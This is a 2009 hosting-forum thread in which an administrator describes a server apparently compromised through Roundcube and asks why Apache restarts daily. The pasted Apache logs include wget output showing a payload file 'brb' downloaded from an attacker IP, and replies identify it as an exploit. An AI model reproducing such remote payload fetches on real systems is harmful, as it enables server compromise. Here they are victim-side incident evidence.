Httpd Restart And Roundcube exploit

D

durjoy

Verified User
Joined
Nov 20, 2007
Messages
13
life is being tough with roundcube exploit. these explot doing my head, started from this monday. my hosting company sent me more than 20 abuse report/email from other network owners. there was attempt to brutforce attack from my IP. i asked hosting compnany for help . they said they will charge 100 USD per hour .

i had a look at httpd error log in direct admin . surprinsgly there is so many error message , and sign downloading remote file ..

[Sun Apr 12 05:01:36 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/nonexisten****
[Sun Apr 12 05:01:36 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/nonexisten****
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/mail
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/mail
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/bin
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/bin
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/rc
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/rc
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
--05:01:37-- http://217.79.182.58/brb
Connecting to 217.79.182.58:80... --05:01:37-- http://217.79.182.58/brb
Connecting to 217.79.182.58:80... --05:01:37-- http://217.79.182.58/brb
Connecting to 217.79.182.58:80... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30987 (30K) [text/plain]
Saving to: `brb.6'

0K ..200 OK
Length: 30987 (30K) [text/plain]
Saving to: `brb.7'

0K ..200 OK
Length: 30987 (30K) [text/plain]
Saving to: `brb.8'

0K .......... ......... ......... .......... .......... ............... ................. 100% 76.1K=0.4s

05:01:38 (76.1 KB/s) - `brb.6' saved [30987/30987]

.... 100% 75.8K=0.4s

05:01:38 (75.8 KB/s) - `brb.7' saved [30987/30987]

.. 100% 76.5K=0.4s

05:01:38 (76.5 KB/s) - `brb.8' saved [30987/30987]

[Sun Apr 12 09:04:54 2009] [error] [client 65.55.106.160] File does not exist: /var/www/html/sv
[Sun Apr 12 09:04:54 2009] [error] [client 65.55.106.160] File does not exist: /var/www/html/404.shtml
[Sun Apr 12 10:01:25 2009] [error] [client 60.190.133.90] Invalid URI in request GET HTTP/1.1 HTTP/1.1
[Sun Apr 12 10:01:25 2009] [error] [client 60.190.133.90] File does not exist: /var/www/html/400.shtml
[Sun Apr 12 10:01:25 2009] [error] [client 60.190.133.90] Invalid URI in request GET HTTP/1.1 HTTP/1.1
[Sun Apr 12 10:01:25 2009] [error] [client 60.190.133.90] File does not exist: /home/durjoy/domains/sharedip/400.shtml
[Sun Apr 12 10:54:27 2009] [error] [client 92.12.49.96] Invalid method in request w.mybanglaspace.com/public/gallery/main/display_1/mode_1/pagesize_12/field_/page_17/
[Sun Apr 12 10:54:27 2009] [error] [client 92.12.49.96] File does not exist: /var/www/html/501.shtml
[Sun Apr 12 16:11:54 2009] [error] [client 213.89.67.79] Invalid method in request ace.com/nasrin
[Sun Apr 12 16:11:54 2009] [error] [client 213.89.67.79] File does not exist: /var/www/html/501.shtml
[Sun Apr 12 18:48:02 2009] [notice] caught SIGTERM, shutting down
[Sun Apr 12 18:48:04 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Sun Apr 12 18:48:04 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Sun Apr 12 18:48:04 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Sun Apr 12 18:48:04 2009] [warn] Init: SSL server IP/port conflict: www.ycwb.org:443 (/usr/local/directadmin/data/users/kafil/httpd.conf:192) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
Click to expand...

last 4 days i have spent all of my time in this forum and googling for solutions, finally i have uninstalled roundcube , secure ssh port and change tmp folder permission. also installed clamav and delete all the infected mails from maildir and imap folder . now my system is clean i have updated clamav and scan again and again there is nothing .

everything was running smoothly . but once again

this morning httpd went offline once again .

every morning UK time arround 6 am , NYC time 1 PM httpd goes offline, look like exploit still remain in the server or it has setup corn job to run it every morning, this is so scary .. my website users already fedup of blank page .


i saw so many people in this forum, experiencing same error, please help if you were able to overcome this error .

thanks



[Thu Apr 16 08:44:28 2009] [warn] Init: SSL server IP/port conflict: localhost:443 (/etc/httpd/conf/extra/httpd-vhosts.conf:38) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 08:44:28 2009] [warn] Init: You should not use name-based virtual hosts in conjunction with SSL!!
[Thu Apr 16 08:44:29 2009] [notice] Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8b DAV/2 PHP/5.2.6 configured -- resuming normal operations
[Thu Apr 16 09:20:41 2009] [notice] caught SIGTERM, shutting down
[Thu Apr 16 09:21:54 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 09:21:54 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 09:21:54 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 09:21:54 2009] [warn] Init: SSL server IP/port conflict: www.ycwb.org:443 (/usr/local/directadmin/data/users/kafil/httpd.conf:192) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 09:21:54 2009] [warn] Init: SSL server IP/port conflict: localhost:443 (/etc/httpd/conf/extra/httpd-vhosts.conf:38) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 09:21:54 2009] [warn] Init: You should not use name-based virtual hosts in conjunction with SSL!!
[Thu Apr 16 09:21:54 2009] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Thu Apr 16 09:21:55 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 09:21:55 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 09:21:55 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 09:21:55 2009] [warn] Init: SSL server IP/port conflict: www.ycwb.org:443 (/usr/local/directadmin/data/users/kafil/httpd.conf:192) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 09:21:55 2009] [warn] Init: SSL server IP/port conflict: localhost:443 (/etc/httpd/conf/extra/httpd-vhosts.conf:38) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 09:21:55 2009] [warn] Init: You should not use name-based virtual hosts in conjunction with SSL!!
[Thu Apr 16 09:21:56 2009] [notice] Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8b DAV/2 PHP/5.2.6 configured -- resuming normal operations
[Thu Apr 16 10:49:04 2009] [warn] (101)Network is unreachable: connect to listener on [::]:443
[Thu Apr 16 10:49:04 2009] [warn] (101)Network is unreachable: connect to listener on [::]:443
[Thu Apr 16 10:49:04 2009] [notice] caught SIGTERM, shutting down
[Thu Apr 16 10:50:17 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 10:50:17 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 10:50:17 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 10:50:17 2009] [warn] Init: SSL server IP/port conflict: www.ycwb.org:443 (/usr/local/directadmin/data/users/kafil/httpd.conf:192) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 10:50:17 2009] [warn] Init: SSL server IP/port conflict: localhost:443 (/etc/httpd/conf/extra/httpd-vhosts.conf:38) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 10:50:17 2009] [warn] Init: You should not use name-based virtual hosts in conjunction with SSL!!
[Thu Apr 16 10:50:17 2009] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Thu Apr 16 10:50:18 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 10:50:18 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 10:50:18 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 10:50:18 2009] [warn] Init: SSL server IP/port conflict: www.ycwb.org:443 (/usr/local/directadmin/data/users/kafil/httpd.conf:192) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 10:50:18 2009] [warn] Init: SSL server IP/port conflict: localhost:443 (/etc/httpd/conf/extra/httpd-vhosts.conf:38) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 10:50:18 2009] [warn] Init: You should not use name-based virtual hosts in conjunction with SSL!!
[Thu Apr 16 10:50:19 2009] [notice] Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8b DAV/2 PHP/5.2.6 configured -- resuming normal operations
[Thu Apr 16 11:19:25 2009] [error] [client 71.127.151.251] File does not exist: /var/www/html/400.shtml
Click to expand...
 
i have updated it and later on i have decided to to delete it, because i dont need this kind of vulnerable email clients anymore .so I have deleted whole round cube folder. still httpd getting restarted , look like exploit has created cornjob to restart everyday .
 
Last edited:
When DirectAdmin does its tallying each night, it automatically restarts Apache after.
 
Missing error messages aren't a problem.
Code: 
Connecting to 217.79.182.58:80... --05:01:37-- http://217.79.182.58/brb
Connecting to 217.79.182.58:80... --05:01:37-- http://217.79.182.58/brb
Connecting to 217.79.182.58:80... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... 200 OK
Hopefully you've resolved, brb is an exploit.

Jeff
 
You must log in or register to reply here.
Back
Top